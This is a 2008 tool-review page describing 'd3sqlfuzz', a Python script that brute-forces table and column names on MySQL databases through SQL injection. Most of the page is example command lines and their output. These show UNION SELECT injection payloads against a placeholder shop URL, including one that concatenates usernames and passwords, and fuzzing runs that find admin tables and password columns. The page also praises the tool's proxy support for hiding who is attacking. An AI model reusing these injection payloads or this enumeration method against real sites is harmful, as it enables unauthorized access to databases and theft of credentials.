 |
 |
 |
 |
 |
  |
|||
 |
 |
 |
|
|
SQL Table/Column Fuzz
Extremely well thought out table and column enumeration python script which can test tables, columns or both. In combination also allows for proxy support to obfuscate who is actually testing the remote MySQL database.
It is available from here. (registration required - I advise you do and regularly check). It will also be available from the main site http://darkc0de.com
Testing Columns and Tables:
d3hydr8@linuxbox:~> python d3sqlfuzz.py "http://www.somesite.com/shop.php?id=41 +and+1=2+union+all+select+1,2,3,COLUMN,null,6,7,8,9,10,11,12,13,14+from+TABLE --" [+] Tables Loaded: 9 [+] Columns Loaded: 7 [+] Fuzzing Tables & Columns [+] Table user Column: user [-] Error Received [+] Table user Column: username [-] Error Received [+] Table user Column: password [-] Error Received [+] Table user Column: passwd [-] Error Received [+] Table user Column: pass [-] Error Received [+] Table user Column: id [-] Error Received [+] Table user Column: email [-] Error Received [+] Table users Column: user [-] Error Received [+] Table users Column: username [-] Error Received [+] Table users Column: password [-] Error Received [+] Table users Column: passwd [-] Error Received [+] Table users Column: pass [-] Error Received [+] Table users Column: id [-] Error Received [+] Table users Column: email [-] Error Received [+] Table adminrights Column: user [!] Combo Found: adminrights user [+] Table adminrights Column: username [!] Combo Found: adminrights username [+] Table adminrights Column: password [!] Combo Found: adminrights password [+] Table adminrights Column: passwd [!] Combo Found: adminrights passwd [+] Table adminrights Column: pass [!] Combo Found: adminrights pass [+] Table adminrights Column: id [!] Combo Found: adminrights id [+] Table adminrights Column: email [!] Combo Found: adminrights email [+] Table username Column: user [-] Error Received [+] Table username Column: username [-] Error Received [+] Table username Column: password [-] Error Received [+] Table username Column: passwd [-] Error Received [+] Table username Column: pass [-] Error Received [+] Table username Column: id [-] Error Received [+] Table username Column: email [-] Error Received [+] Table usernames Column: user [-] Error Received [+] Table usernames Column: username [-] Error Received [+] Table usernames Column: password [-] Error Received [+] Table usernames Column: passwd [-] Error Received [+] Table usernames Column: pass [-] Error Received [+] Table usernames Column: id [-] Error Received [+] Table usernames Column: email [-] Error Received [+] Table admin Column: user [-] Error Received [+] Table admin Column: username [-] Error Received [+] Table admin Column: password [-] Error Received [+] Table admin Column: passwd [-] Error Received [+] Table admin Column: pass [-] Error Received [+] Table admin Column: id [-] Error Received [+] Table admin Column: email [-] Error Received [+] Table administrator Column: user [-] Error Received [+] Table administrator Column: username [-] Error Received [+] Table administrator Column: password [-] Error Received [+] Table administrator Column: passwd [-] Error Received [+] Table administrator Column: pass [-] Error Received [+] Table administrator Column: id [-] Error Received [+] Table administrator Column: email [-] Error Received [+] Table login Column: user [-] Error Received [+] Table login Column: username [-] Error Received [+] Table login Column: password [-] Error Received [+] Table login Column: passwd [-] Error Received [+] Table login Column: pass [-] Error Received [+] Table login Column: id [-] Error Received [+] Table login Column: email [-] Error Received [+] Table perdorues Column: user [-] Error Received [+] Table perdorues Column: username [-] Error Received [+] Table perdorues Column: password [-] Error Received [+] Table perdorues Column: passwd [-] Error Received [+] Table perdorues Column: pass [-] Error Received [+] Table perdorues Column: id [-] Error Received [+] Table perdorues Column: email [-] Error Received [-] Done
Testing Just Tables:
d3hydr8@linuxbox:~> python d3sqlfuzz.py "http://www.somesite.com/shop.php?id=41+ and+1=2+union+all+select+1,2,3,concat(username,char(58),password),null,6,7,8,9, 10,11,12,13,14+from+TABLE--" [+] Tables Loaded: 9 [+] Columns Loaded: 7 [+] Fuzzing Tables [+] Testing: user [-] Error Received [+] Testing: users [-] Error Received [+] Testing: adminrights [!] Table Found: adminrights [+] Testing: username [-] Error Received [+] Testing: usernames [-] Error Received [+] Testing: admin [-] Error Received [+] Testing: administrator [-] Error Received [+] Testing: login [-] Error Received [+] Testing: perdorues [-] Error Received [-] Done
Testing Just Columns:
d3hydr8@linuxbox:~> python d3sqlfuzz.py "http://www.somesite.com/shop.php?id=41+ and+1=2+union+all+select+1,2,3,COLUMN,null,6,7,8,9,10,11,12,13,14+from+ adminrights--" [+] Tables Loaded: 9 [+] Columns Loaded: 7 [+] Fuzzing Columns [+] Testing: user [-] Error Received [+] Testing: username [!] Column Found: username [+] Testing: password [!] Column Found: password [+] Testing: passwd [-] Error Received [+] Testing: pass [-] Error Received [+] Testing: id [!] Column Found: id [+] Testing: email [-] Error Received [-] Done
Testing with Proxy Support:
d3hydr8@linuxbox:~> python d3sqlfuzz.py "http://www.somesite.com/shop.php?id=41+ and+1=2+union+all+select+1,2,3,COLUMN,null,6,7,8,9,10,11,12,13,14+from+ adminrights--" [+] Testing Proxy... [+] Proxy: 58.97.1.24:8080 [+] Building Handler [+] Tables Loaded: 9 [+] Columns Loaded: 7 [+] Fuzzing Columns [+] Testing: user [-] Error Received [+] Testing: username [!] Column Found: username [+] Testing: password [!] Column Found: password [+] Testing: passwd [-] Error Received [+] Testing: pass [-] Error Received [+] Testing: id [!] Column Found: id [+] Testing: email [-] Error Received [-] Done
|
IT Security News:
Pen Testing Framework:
Latest Tool Reviews:
|
| © VulnerabilityAssessment.co.uk 01 May 2008 |
|
